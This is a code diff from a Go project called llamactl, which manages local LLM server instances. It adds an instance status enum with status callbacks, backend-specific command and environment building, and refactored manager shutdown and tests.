var args []string
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
// For Docker, start with Docker args
args = append(args, backendConfig.Docker.Args...)
args = append(args, backendConfig.Docker.Image)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
}
}
} else {
// For native execution, start with backend args
args = append(args, backendConfig.Args...)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
}
}
}
return args
}
func (c *CreateInstanceOptions) BuildEnvironment(backendConfig *config.BackendSettings) map[string]string {
env := map[string]string{}
if backendConfig.Environment != nil {
maps.Copy(env, backendConfig.Environment)
}
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
if backendConfig.Docker.Environment != nil {
maps.Copy(env, backendConfig.Docker.Environment)
}
}
if c.Environment != nil {
maps.Copy(env, c.Environment)
}
return env
}
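To make the precedence concrete, here is a minimal sketch for a native (non-Docker) llama.cpp backend: instance-level variables override backend-level ones, and buildCommand then appends the merged map after os.Environ(), so on recent Go versions (where os/exec keeps the last duplicate key) these values also override the host environment. The variable name below is only illustrative.

package main

import (
	"fmt"

	"llamactl/pkg/backends"
	"llamactl/pkg/backends/llamacpp"
	"llamactl/pkg/config"
	"llamactl/pkg/instance"
)

func main() {
	settings := &config.BackendSettings{
		Command:     "llama-server",
		Args:        []string{},
		Environment: map[string]string{"OMP_NUM_THREADS": "4"}, // backend-level
	}

	opts := &instance.CreateInstanceOptions{
		BackendType:        backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/path/to/model.gguf", Port: 8080},
		Environment:        map[string]string{"OMP_NUM_THREADS": "8"}, // instance-level wins
	}

	fmt.Println(opts.GetCommand(settings))       // "llama-server" (Docker not enabled)
	fmt.Println(opts.BuildCommandArgs(settings)) // backend Args followed by the llama-server flags
	fmt.Println(opts.BuildEnvironment(settings)) // map[OMP_NUM_THREADS:8]
}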

pkg/instance/status.go (new file, 70 lines added)

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}
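A quick round-trip sketch: the status travels as its lowercase name, and unknown names fall back to Stopped instead of failing.

package main

import (
	"encoding/json"
	"fmt"

	"llamactl/pkg/instance"
)

func main() {
	// Marshal: the enum value is emitted as its lowercase name.
	out, _ := json.Marshal(instance.Failed)
	fmt.Println(string(out)) // "failed"

	// Unmarshal: known names map back to the enum; an unknown name would be
	// logged and mapped to Stopped rather than returning an error.
	var s instance.InstanceStatus
	_ = json.Unmarshal([]byte(`"running"`), &s)
	fmt.Println(s == instance.Running) // true
}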


@@ -13,7 +13,7 @@ func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.Running || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}


@@ -1,6 +1,7 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
@@ -32,23 +33,45 @@ func (m *MockTimeProvider) SetTime(t time.Time) {
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -56,12 +79,16 @@ func TestShouldTimeout_NotRunning(t *testing.T) {
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
@@ -70,6 +97,15 @@ func TestShouldTimeout_NotRunning(t *testing.T) {
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -85,16 +121,20 @@ func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.Running = true
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
@@ -104,6 +144,15 @@ func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -111,13 +160,17 @@ func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
@@ -129,6 +182,15 @@ func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -136,13 +198,17 @@ func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
@@ -160,6 +226,15 @@ func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -179,12 +254,16 @@ func TestTimeoutConfiguration_Validation(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {


@@ -21,17 +21,21 @@ type InstanceManager interface {
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
ports map[int]bool
instancesConfig config.InstancesConfig
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
backendsConfig config.BackendConfig
// Timeout checker
timeoutChecker *time.Ticker
@@ -41,14 +45,16 @@ type instanceManager struct {
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
backendsConfig: backendsConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
@@ -121,10 +127,10 @@ func (im *instanceManager) persistInstance(instance *instance.Process) error {
func (im *instanceManager) Shutdown() {
im.mu.Lock()
defer im.mu.Unlock()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
@@ -132,27 +138,32 @@ func (im *instanceManager) Shutdown() {
// Signal the timeout checker to stop
close(im.shutdownChan)
// Release lock temporarily to wait for goroutine
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Reacquire lock
im.mu.Lock()
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(im.instances))
for name, inst := range im.instances {
if !inst.Running {
wg.Done() // If instance is not running, just mark it as done
continue
}
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
@@ -160,7 +171,7 @@ func (im *instanceManager) Shutdown() {
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(name, inst)
}(runningNames[i], inst)
}
wg.Wait()
@@ -227,16 +238,20 @@ func (im *instanceManager) loadInstance(name, path string) error {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.Running = persistedInstance.Running
inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
port := inst.GetOptions().Port
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
@@ -252,7 +267,7 @@ func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.Running && // Was running when persisted
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
@@ -264,9 +279,20 @@ func (im *instanceManager) autoStartInstances() {
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.Running = false
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}


@@ -2,6 +2,7 @@ package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
@@ -11,28 +12,35 @@ import (
"strings"
"sync"
"testing"
"time"
)
func TestNewInstanceManager(t *testing.T) {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
mgr := manager.NewInstanceManager(backendConfig, cfg)
if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
@@ -41,220 +49,18 @@ func TestNewInstanceManager(t *testing.T) {
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetOptions().Port
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
@@ -263,9 +69,10 @@ func TestPersistence(t *testing.T) {
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg)
manager1 := manager.NewInstanceManager(backendConfig, cfg)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
@@ -283,7 +90,7 @@ func TestPersistence(t *testing.T) {
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(cfg)
manager2 := manager.NewInstanceManager(backendConfig, cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
@@ -312,119 +119,27 @@ func TestPersistence(t *testing.T) {
}
}
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.Running = true
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.Running = false
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.Running = true // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.Running = false
}
func TestConcurrentAccess(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
mgr := createTestManager()
defer mgr.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := 0; i < 5; i++ {
for i := range 5 {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := manager.CreateInstance(instanceName, options); err != nil {
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
@@ -435,7 +150,7 @@ func TestConcurrentAccess(t *testing.T) {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := manager.ListInstances(); err != nil {
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
@@ -451,59 +166,46 @@ func TestConcurrentAccess(t *testing.T) {
}
func TestShutdown(t *testing.T) {
manager := createTestManager()
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
manager.Shutdown()
mgr.Shutdown()
// Multiple shutdowns should not panic
manager.Shutdown()
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(cfg)
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
return manager.NewInstanceManager(backendConfig, cfg)
}


@@ -2,12 +2,15 @@ package manager
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
@@ -50,24 +53,17 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign a port if not specified
if options.Port == 0 {
port, err := im.getNextAvailablePort()
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
}
inst := instance.NewInstance(name, &im.instancesConfig, options)
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
im.ports[options.Port] = true
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
@@ -109,7 +105,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.CreateI
}
// Check if instance is running before updating options
wasRunning := instance.Running
wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
@@ -147,11 +143,11 @@ func (im *instanceManager) DeleteInstance(name string) error {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetOptions().Port)
